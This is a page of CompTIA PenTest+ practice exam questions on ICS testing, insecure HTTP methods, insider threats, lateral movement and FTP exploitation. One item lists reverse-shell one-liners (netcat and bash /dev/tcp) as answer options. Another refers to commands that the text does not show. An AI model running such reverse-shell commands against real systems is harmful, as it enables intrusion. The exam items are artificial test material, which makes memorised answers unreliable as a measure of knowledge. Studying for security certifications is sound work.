Comptia (PT0-001) Exam Questions And Answers page 4
An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to manage power generation and cooling. Which of the following is a consideration unique to such an environment that must be made by the firm when preparing for the assessment?
Current and load ratings of the ICS components
Potential operational and safety hazards
Electrical certification of hardware used in the test
Attacks and Exploits
Penetration Testing Tools
An engineer, who is conducting a penetration test for a web application, discovers the user login process sends from field data using the HTTP GET method. To mitigate the risk of exposing sensitive information, the form should be sent using an:
HTTP POST method.
HTTP OPTIONS method.
HTTP PUT method.
HTTP TRACE method.
Attacks and Exploits
Penetration Testing Tools
An individual has been hired by an organization after passing a background check. The individual has been passing information to a competitor over a period of time. Which of the following classifications BEST describes the individual?
APT
Insider threat
Script kiddie
Hacktivist
Planning and Scoping
Information Gathering and Vulnerability Identification
An organization has requested that a penetration test be performed to determine if it is possible for an attacker to gain a foothold on the organization s server segment. During the assessment, the penetration tester identifies tools that appear to have been left behind by a prior attack. Which of the following actions should the penetration tester take?
Attempt to use the remnant tools to achieve persistence.
Document the presence of the left-behind tools in the report and proceed with the test.
Remove the tools from the affected systems before continuing on with the test.
Discontinue further testing and report the situation to management.
Attacks and Exploits
Penetration Testing Tools
A penetration tester attempts to perform a UDP port scan against a remote target using an Nmap tool installed onto a non-Kali Linux image. For some reason, the UDP scan falls to start. Which of the following would MOST likely help to resolve the issue?
Install the latest version of the tool.
Review local iptables for existing drop rules.
Relaunch the tool with elevated privileges.
Enable both IPv4 and IPv6 forwarding.
Attacks and Exploits
Penetration Testing Tools
A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester MOST likely use?
perl -e 'use SOCKET'; $i='; $p='443;
ssh superadmin@ -p 443
nc -e /bin/sh 443
bash -i >& /dev/tcp//443 0>&1
Attacks and Exploits
Penetration Testing Tools
A penetration tester delivers a web application vulnerability scan report to a client. The penetration tester rates a vulnerability as medium severity. The same vulnerability was reported as a critical severity finding on the previous report. Which of the following is the MOST likely reason for the reduced severity?
The client has applied a hot fix without updating the version.
The threat landscape has significantly changed.
The client has updated their codebase with new features.
Thera are currently no known exploits for this vulnerability.
Attacks and Exploits
Penetration Testing Tools
A penetration tester directly connects to an internal network. Which of the following exploits would work BEST for quick lateral movement within an internal network?
Crack password hashes in /etc/shadow for network authentication.
Launch dictionary attacks on RDP.
Conduct a whaling campaign.
Poison LLMNR and NBNS requests.
Attacks and Exploits
Penetration Testing Tools
A penetration tester discovers an anonymous FTP server that is sharing the C:\drive. Which of the following is the BEST exploit?
Place a batch script in the startup folder for all users.
Change a service binary location path to point to the tester s own payload.
Escalate the tester s privileges to SYSTEM using the at.exe command.
Download, modify, and reupload a compromised registry to obtain code execution.
Attacks and Exploits
Penetration Testing Tools
A penetration tester executes the following commands:
Which of the following is a local host vulnerability that the attacker is exploiting?
Which of the following is a local host vulnerability that the attacker is exploiting?
Insecure file permissions
Application whitelisting
Shell escape
Writable service
Attacks and Exploits
Penetration Testing Tools
Comments